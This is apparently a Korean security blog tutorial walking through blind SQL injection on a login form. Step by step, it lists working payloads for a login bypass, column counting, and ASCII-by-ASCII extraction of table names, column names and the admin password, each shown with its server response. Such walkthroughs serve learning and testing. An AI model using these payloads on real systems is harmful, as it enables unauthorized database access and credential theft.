반응형

참고

- http://blog.naver.com/funny303/220778035079

- http://pypie.tistory.com/entry/Blind-SQL-Injection

- http://www.securityidiots.com/Web-Pentest/SQL-Injection/Blind-SQL-Injection.html


1. SQL Injection 테스트


[SQL Injection Query]


' or 1=1 #
 ' or 1=1 --


[Request]


1) Success. // 성공

2) Login Failed // 실패



2. Blind Injection


2.1. Database 갯수 확인


[[ 데이터 베이스 확인 ]]


id= ' or 1=1 and 1=1 order by 1.2 #

- Response : Success

id= ' or 1=1 and 1=1 order by 1.2.3 #

- Response : Login Failed


2.2. 테이블 명 추출


[[ 테이블(information_schema.tables) 추출 ]]


:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 #

- Response : Login Failed


:: 첫번째 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 108 #

- Response : Success


:: 확실히 맞는지 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 #

- Response : Success


:: 두번째 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 109 #

- Response : Success


:: 마지막 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 #


2.3. Column명 추출


[[ column 추출 - information_schema.columns ]]

--> 테이블 명에서 찾은 "member"를 활용


:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임

' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 #
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 53)#

:: 첫번째 컬럼
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) = 110)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),2,1)) = 111)#
no

:: 두번째 컬럼
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),1,1)) = 105)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),2,1)) = 100)#
id


2.4. value 찾기


[[ 저장된 값 찾기 ]]


' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)#
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) = 115)#

' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)#


이상으로 마칩니다.

thanks : silverbug (enviroment support)

반응형

'Hacking' 카테고리의 다른 글

카드 대란 정말 안전한가???  (1) 2014.01.24
[CE] cheatengine 멋지다..  (0) 2013.07.01
[one point] 지뢰찾기  (0) 2012.01.05

+ Recent posts